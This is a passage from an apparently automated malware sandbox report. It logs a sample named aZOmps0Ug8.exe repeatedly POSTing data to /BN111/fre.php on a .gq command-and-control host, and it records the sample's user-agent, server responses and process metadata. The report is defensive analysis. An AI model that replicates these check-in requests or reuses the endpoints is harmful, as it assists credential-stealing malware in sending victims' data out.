20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.6	49785	104.21.62.32	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:28:26.025161982 CEST	1066	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:28:26.179322958 CEST	1067	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:28:26 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NBl2laSVW7g6vrcMW38%2F2YBxeOPQrkwxtPhBgARwSEgAQNN%2Fw9iGGS%2FMcVDd5bsPKDfZf7F34jWKWukgO%2BC6zW4jkS8RqojfmfBcKo9bpy3LJAKlcTfInQaxeHYOzrjAYApe5O2EWJUMAr1uyWTrEaztAHnaRg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69debf5eafe9695b-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
60	192.168.2.6	49915	172.67.219.104	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:29:48.049870968 CEST	7898	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:29:48.166955948 CEST	7899	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:29:48 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9ZdGBK3Ox1p3BP97R4wYPo9%2BZ%2BK%2BUNVgFS7K2qZhwn3i65B5C5A3pC3HLkVBNXtwYCFsRF61IdHwby7cVDx52m03DlTnECOLo8Lmli9FT05kblnLTrBBndQTbweHp3wkkwehoYbNghK3zTDnn9Dwh%2FhMcQro9g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69dec15f58a805f1-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
61	192.168.2.6	49916	172.67.219.104	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:29:49.324402094 CEST	7900	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:29:49.441760063 CEST	7901	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:29:49 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VWWcbe3rqobGQ9zLXDZxDyBG75FOgSItYobuAtwDJpuAbL30zBatxbptze92UIC6gFoHQbenK4p440cH1CZduHVw9uJaoknjqoprxaW930U5gFR4LDNYtmvuhdpe4PmdBZYp9RJ3m58CjMFtKREDlk3%2FI4VSUQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69dec1674b4c2c3e-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
62	192.168.2.6	49918	104.21.62.32	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:29:51.880553961 CEST	7910	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:29:51.998187065 CEST	7911	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:29:51 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BsMAOCkH1sJ0oabis0Q4paNtyJNrES9QQwxvqkXvAl%2FY7%2BLQH8xSnKIcHV%2BPPogWaqk3yG%2FJ6vxc%2FEk34SqAVeWUDw7vDSJQdrJh0Hz27m7Tiv3u6y6ahjT5NNVAW4JRx6Ib5AME7x%2F0Mc2jzF8N3OMd71mu%2FA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69dec1774cc64e3d-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
63	192.168.2.6	49921	172.67.219.104	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:29:55.836602926 CEST	7917	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:29:55.948838949 CEST	7923	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:29:55 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LZ79cKido18sGHwuiNL%2F6O3gjFK34JZEyXZk1N8Qfy7pzHQIXqqquQIRfLJylWp%2Blb0ebXTVq%2F1bHmKtkJSRQAwrjU9cWyaKEY%2BfKI4BTUk6fnLRAUL796Gtr9VyUOxCK%2BmAyJmCSy2lit2HcTF7NC6%2BtJ15NA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69dec1900cfd68ef-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
64	192.168.2.6	49923	104.21.62.32	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:29:56.968339920 CEST	7926	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:29:57.081579924 CEST	7927	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:29:57 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MLALdhBf343n2G8LZLoDwb6Mh5vWVGbC472SfDfdBH%2B1zblvJJUUdQJELnMb%2Bod0RSTtp3nexN46I4MemNvht6DC79ZyaLJ9Tj8z0PlQvLxyWkeCuuJUc6JQy22HYxAbvcclmEPUk4DRcOjj7k3c%2FCX8oeDUlg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69dec1971aee4dbe-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
65	192.168.2.6	49924	104.21.62.32	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:29:58.074973106 CEST	7928	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:29:58.188767910 CEST	7929	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:29:58 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pVTqfGYZG6lbiEUhHSdVmZCauemUr0Y%2BDwMOl8jQ0ldqgtA9xITilJs5vYZLZNEyT9OJN5kbjp%2BHOE4k2qqoAIe1jVhjQmKAUvsYFRYqMSmsNtQoFZ6LNXkpPSpmxGfDzqZFj4XqecgblbCCY5cS5zLZfkAuhA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69dec19dfc3bdfcb-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
66	192.168.2.6	49925	172.67.219.104	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:29:59.226830959 CEST	7930	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:29:59.347254038 CEST	7932	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:29:59 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gkjqA8qOHfmIDF%2B8y6qiYNfi%2BvKCn%2B9wfdd4HCP%2BYK0cnk28ajujXQRfcV4yPhPUB7cMD%2BZEx7KfsoCvsEDx9F1mGzxm8QL25QRC9D1NyirQW8VbFsNKnqSicUuJ0ck1LD6iO4oBLd%2BuJGOeJcZ4Ij1Vwl5I4w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69dec1a53d361f21-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
67	192.168.2.6	49926	104.21.62.32	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:30:00.311328888 CEST	7932	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:30:00.468617916 CEST	7933	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:30:00 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=iotQdWvLirTujDm5gcFSZO5hAVcZRC711g1iSDRI0%2Brb3822z%2BZAkRmuSDHdic5Uj57iNRI9xX3TN9YhS73pU0g3Awy8opYScVWOMDtQ3fUBF1pTWEZk13UdVN58f%2F5cQx2fm8PSSX%2BiO3wOmcduLTFZflpDzA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69dec1abfe1005b3-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
68	192.168.2.6	49927	104.21.62.32	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:30:01.416466951 CEST	7935	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:30:01.529956102 CEST	7936	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:30:01 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CiMowfP3p1ILABVXu8os0ZvSOz0H05YMNivh25CZUCDEqQaAY7dMsK8WCuL55RhExNK%2Bo6QnXW2OoiY91LV4aaKszjnsVP1HpaPN5F1rSwA%2BPDZXqH2LcFbJP9o0ixVca8u%2FnOqGjaVHkzJnEmiYU0ivx8ExBw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69dec1b2eb3f1f2d-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
69	192.168.2.6	49928	104.21.62.32	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:30:02.546683073 CEST	7937	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:30:02.660093069 CEST	7938	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:30:02 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Ga%2FiBjWS7EnclaPLKo1yPnxw%2BS5FfTFKHZyEfv8SBx7PLc2z9qVP39s4Ou2jxC%2Fu692YAeRobnrXUUs%2FH5lz44oFoe0MdOk11UK7d0oa85kJs8BzBG9Wn1TN%2BaAxNOIaqjCVMknge%2BA0NpNTHFqXMCVwFECLVA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69dec1b9fcbb4a6d-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.6	49786	172.67.219.104	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:28:27.340971947 CEST	1068	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:28:27.495248079 CEST	1069	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:28:27 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OvCReYL5kOGzCHk1X2inrDg3LE1il6%2B7FTgD%2FXIswLKX9fCBRgXz9DRTR%2BULHUkhSfhznG6alUky58mQbc1ir%2ByqnxuDkYKD854tu9UOoiYexIWXj8lJVJPVQ2nEQja6fVQg5wAHAZeKEplbfNmZMMqLBlJM6A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69debf66ec32692b-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
70	192.168.2.6	49929	172.67.219.104	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:30:03.716522932 CEST	7939	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:30:03.830050945 CEST	7940	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:30:03 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lYEXv8S4QiPBTpXu0rf5bJXcJoQvbh8c7zrS9vvc7tBBFtqt%2FvJ59pUThsIsz8qJpgBGda1LHR3Qb02pkkKRC8u7P6%2BBRoVadCg8Od0Z6UP29X6bSAT1Hn6xm8BlysHdhvQ59Xz1U2tY28nHS%2BqgJgDxQY4HdA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69dec1c14c3ad6f5-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
71	192.168.2.6	49930	172.67.219.104	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:30:04.877321005 CEST	7941	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:30:04.995676041 CEST	7942	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:30:04 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yauK70pfnNL%2FJ90goDaRLF0fpdY6QkzTDmTkMnqaOy%2Bzsu%2BpC4W1kWkeLla6LwdlVBR9OMv4e4x9fXwxwON1%2FUNUz5VC3UtbTzqe0Ta8KCEmGddTn%2FYX5GbiYSC%2B8T4y3Jh3h%2FGtVWT8LEgia0f88sVfgxwueQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69dec1c88f4e3258-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
72	192.168.2.6	49931	172.67.219.104	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:30:05.956295967 CEST	7943	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:30:06.071351051 CEST	7944	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:30:06 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FqfohRhEiuDGtoufJZoPIftug9rZXOY0iplMIhBxlnIZUjBXtab%2FI2jNrquCvC6cysFzwjayYPJM%2BQ8Xe4Icd2EQlB4ETqyyfmXIN7wgx7vriAXvx8gP%2BAmVX2ww%2FgOFnLGPHUENBicNBv5tAeMhrHNfgSR2tA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69dec1cf4b1f63a7-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
73	192.168.2.6	49932	172.67.219.104	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:30:07.140644073 CEST	7945	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
74	192.168.2.6	49933	104.21.62.32	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
75	192.168.2.6	49934	172.67.219.104	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
76	192.168.2.6	49935	104.21.62.32	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
77	192.168.2.6	49936	172.67.219.104	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
78	192.168.2.6	49937	104.21.62.32	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
79	192.168.2.6	49938	172.67.219.104	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.6	49787	172.67.219.104	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:28:30.289741993 CEST	1070	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:28:30.451376915 CEST	1071	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:28:30 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0Hk46wdoG1U27nz707h6QtW1GUw2h6o9OisNkyhB2aYUTsS7ahwfcM37s0X%2BXm8zCJMTqINkuUnoOUc6RiTwkeUHqopnJbQ82UpWA9CyU9N%2BqKVbZ2JX9RAD3Z5d9c3nY2pdXuQ2K39C%2BMU9nFo%2Bj20Dqe22SQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69debf795ca042e1-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
80	192.168.2.6	49939	172.67.219.104	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.6	49788	172.67.219.104	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:28:31.397798061 CEST	1072	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:28:31.565464973 CEST	1073	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:28:31 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xk4891DLaBXXjT1FhSY5vGjPMlx7%2FPwKsYbmlt3n3G5MwqOiF37%2FMqhNAZ9k%2FwEIMsJstsiC5k0UvsMw0imxbeYrZlZTQ1lGsg9Eox%2BRhZh7Mbe51awkrb53qeX5Jtjag4OXYQUnQ2SLmWUAhH7J7El0v%2F1uGA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69debf804c5d4eb0-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: aZOmps0Ug8.exe PID: 6780 Parent PID: 5632

General

Start time:	08:28:10
Start date:	14/10/2021
Path:	C:\Users\user\Desktop\aZOmps0Ug8.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\aZOmps0Ug8.exe'
Imagebase:	0x400000
File size:	283552 bytes
MD5 hash:	70D177ABC7455C709AE9710630B9EA49
Has elevated privileges:	true
Has administrator privileges:	true
